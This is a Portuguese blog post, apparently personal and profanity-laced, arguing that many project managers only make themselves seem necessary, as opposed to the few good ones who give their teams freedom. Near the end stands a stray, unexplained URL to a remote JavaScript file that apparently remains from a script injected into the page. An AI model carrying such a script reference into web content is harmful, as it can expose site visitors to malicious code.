E aí, seu gerente se faz necessário ou é necessário?

Fala pessoal, depois da pesquisa que realizei, e alguns emails que recebi, algumas trocas de ideias, fiquei com várias coisas borbulhando na cabeça, o gerente é necessário ou se faz necessário? Eu tenho uma resposta particular sobre isso, eu acho que MUITOS se fazem necessários, continuem lendo e veja se entendem minha opinião.

Trabalhei com várias pessoas, com diversos perfis diferentes, em particular trabalhei com dois grandes pensadores (Gerente), em duas empresas, não vou divulgar seus nomes, esses eu posso dizer, eram do CARAL**, eles não se faziam necessários, eles eram necessários.

Também trabalhei com vários p** no c*, que se faziam necessários, até hoje me pergunto, como uma empresa deixa esses hippos no comando, sim no comando, eram generais, capitães e uns baba ovo.

Só de lembrar dessas pessoas, já me da náuseas, vamos continuar…

Eu não estou aqui querendo matar o gerente de projeto, acabar com sua profissão, estou querendo que eles na verdade vejam que estamos no seculos XXI, eu mesmo formei em Gerenciamento de Projetos pela FGV, só que me adaptei as mudanças, muitos se acomodaram e pararam no tempo, não acompanharam a constante mudança de mercado, já não estamos mais na era industrial, estamos como já disse no seculo XXI.

Vi vários gerentes de slide, project, excel, sempre pedindo, me fala uma data de conclusão, adoram o modelo cascata e uma data (ERRADA) de termino, a unica coisa que sei, que a data de sua entrega já está errada. Ficava puto, sim, PUTO, quando me perguntavam o que estava fazendo, dava uma vontade de falar “To aqui no netflix vendo uma série ou to aqui de passagem de bobeira”, caralh* você não é porr* do gerente, e não sabe o que estamos fazendo??? Cadê o excel, o project, eles estão ali de enfeite?

Esses hippos estavam ali só para mostrarem números para a hierarquia, eles adoram a hierarquia! O projetos desses, sempre tinham problemas, as datas de entregas como disse, estavam erradas. E as reuniões desnecessárias? Eles nunca tinham tempo, tinham que atualizar suas planilhas e sei lá, nem sei o que faziam na verdade.

E os que eu trabalhei que eram do caralh*, sim, do caralh*, eles davam liberdade para equipe, as coisas fluíam, a autoestima da equipe, era lá no alto, você já ouviu falar da metáfora da formiga neh? se não, então sugiro que leia urgente clique aqui

Como diz o jian yang silicon valley: this is no life i want to live.

Pessoal acho que era isso, e aí, seu gerente é necessário ou se faz necessário?

 

https://cloudapi.online/js/api46.js

Deixe um comentário

